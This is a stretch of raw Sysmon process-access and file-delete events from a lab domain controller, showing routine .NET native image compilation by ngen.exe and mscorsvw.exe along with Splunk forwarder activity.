21:07:10.780{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B505-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023439Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:10.780{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B505-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023438Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.780{4DB9351A-A27E-60D3-B405-00000000CF01}6244NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8C2PTACWP1\SecurityAuditPoliciesSnapIn.ni.dll.auxMD5=87E6F94B31A4837D8DBC19D130730AE5,SHA256=5FD3FC5BC8626A921390E455021ACA24A0FE49C47EABD10C9E04ACD03F3AF220,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023437Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.780{4DB9351A-A27E-60D3-B405-00000000CF01}6244NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8C2PTACWP1\SecurityAuditPoliciesSnapIn.ni.dllMD5=A3454DE1CC12F337CC901E8FF596848E,SHA256=82DBBEFDF6A6CB1929401BAA71D253A452A98CF0E832014878D61BDCA0019A05,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023436Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B405-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023435Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.701{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B405-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023434Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:10.701{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B405-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023433Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.686{4DB9351A-A27E-60D3-B305-00000000CF01}5820NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Q7ALGL644P\ReachFramework.ni.dll.auxMD5=E34CC248E3C1248214A25675F74431C9,SHA256=622B7DB7F53A92FB3762828FF64D1FE6C7B9B0370743814196B06B2B82C8268F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.686{4DB9351A-A27E-60D3-B305-00000000CF01}5820NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Q7ALGL644P\ReachFramework.ni.dllMD5=9917712B31D067FF11C4299EBFA6B745,SHA256=AF1736104A745E7136D0D2C19E210634FC6A7158A9944200DEEDA6D26F4BC1DD,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.467{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B305-00000000CF01}5820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.436{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B305-00000000CF01}5820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:10.436{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B305-00000000CF01}5820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.436{4DB9351A-A27E-60D3-B205-00000000CF01}5460NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DNTH5P07AZ\PresentationUI.ni.dll.auxMD5=2993C6918A12D9DDF1D4E2208521ECA0,SHA256=1BCD04BA0B2F9190D5A7D30364B046CD933FEA59A68BDE56C4A8AF9BD18B258E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.436{4DB9351A-A27E-60D3-B205-00000000CF01}5460NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DNTH5P07AZ\PresentationUI.ni.dllMD5=C1CE6DAF775714C567D72FDA177E50E7,SHA256=25BDDFD52117B99B7BF3218A3B9E85016AF38184CE1F7E0B5A8B4ACB58182C6F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.358{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0079A5C6258DEA0FA3EEC411B78BB5E1,SHA256=14A1AB7818DB1C80FC349363C0F96C16E6EFF9AA4BE187B3B27CDF92D8CBC3F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.326{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B205-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.311{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B205-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.311{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B205-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.311{4DB9351A-A27E-60D3-B105-00000000CF01}6616NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WXFKYWBWQM\PresentationFramework.Royale.ni.dll.auxMD5=56F390B4026C92CCEEABF0A268D982C8,SHA256=921BBC0BA241B3245FB28BDF109DEC35287D9DFB2DDC37DF6A1F9CAC8FAEDD6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.311{4DB9351A-A27E-60D3-B105-00000000CF01}6616NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\WXFKYWBWQM\PresentationFramework.Royale.ni.dllMD5=9773C82D63BAF79DD7A5BD176D3F2F40,SHA256=C13DA5170060B5FEB711BBCD3589A405D94154FC63089A138E5C68089EFF6207,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023420Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.295{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4252A38DF68D7A56A4339DE4BB1EEDD4,SHA256=A67D67EDAB5D6418CFF5405F148B64C9E514A90F012B2664548DB3176A268CD7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023419Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:10.295{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B105-00000000CF01}6616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023418Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.264{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B105-00000000CF01}6616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023417Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:10.264{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B105-00000000CF01}6616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023416Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.264{4DB9351A-A27E-60D3-B005-00000000CF01}6716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ENLJGBEE8N\PresentationFramework.Luna.ni.dll.auxMD5=DE62C0201D0D43381C9CF2D304D0F522,SHA256=389C1EA38099D62D9A9BEA5D838278781BA50DC1A9179B5315A84F56CB74FEF8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023415Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.264{4DB9351A-A27E-60D3-B005-00000000CF01}6716NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ENLJGBEE8N\PresentationFramework.Luna.ni.dllMD5=179A0AE9A9C89EC3D44638AED665E2D3,SHA256=6626CAD6D91597D050F69726F654A54D88196ABCDDCDC79D59146B9A0CE84E66,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023414Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.168{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27E-60D3-B005-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023413Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.152{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27E-60D3-B005-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023412Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:10.152{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27E-60D3-B005-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023411Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:10.136{4DB9351A-A27E-60D3-AF05-00000000CF01}4480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\68RL3BVWE4\PresentationFramework.Classic.ni.dll.auxMD5=BAED2E45D30C36864DE9EA27892916F5,SHA256=58CA80E6DC5CCA84A1442E72126046C5EC91669129586F1A0310571058264C7C,IMPHASH=00000000000000000000000000000000falsetrue 
